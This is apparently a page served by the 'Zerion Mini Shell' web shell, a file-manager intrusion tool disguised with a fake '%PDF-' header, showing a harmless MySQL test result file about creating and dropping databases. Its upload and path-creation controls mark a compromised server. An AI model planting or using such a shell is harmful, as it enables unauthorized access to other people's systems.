%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/rs/mysql/5.1/mysql-test/suite/engines/funcs/r/
Upload File :
Create Path :
Current File : //home/rs/mysql/5.1/mysql-test/suite/engines/funcs/r/db_create_drop.result

DROP DATABASE IF EXISTS d1;
CREATE DATABASE d1;
SHOW DATABASES;
Database
information_schema
d1
mtr
mysql
test
SHOW DATABASES LIKE 'd%';
Database (d%)
d1
SHOW DATABASES LIKE '%';
Database (%)
information_schema
d1
mtr
mysql
test
USE d1;
DROP DATABASE d1;
CREATE SCHEMA d1;
SHOW SCHEMAS;
Database
information_schema
d1
mtr
mysql
test
SHOW SCHEMAS LIKE 'd%';
Database (d%)
d1
SHOW SCHEMAS LIKE '%';
Database (%)
information_schema
d1
mtr
mysql
test
USE d1;
DROP SCHEMA d1;

Zerion Mini Shell 1.0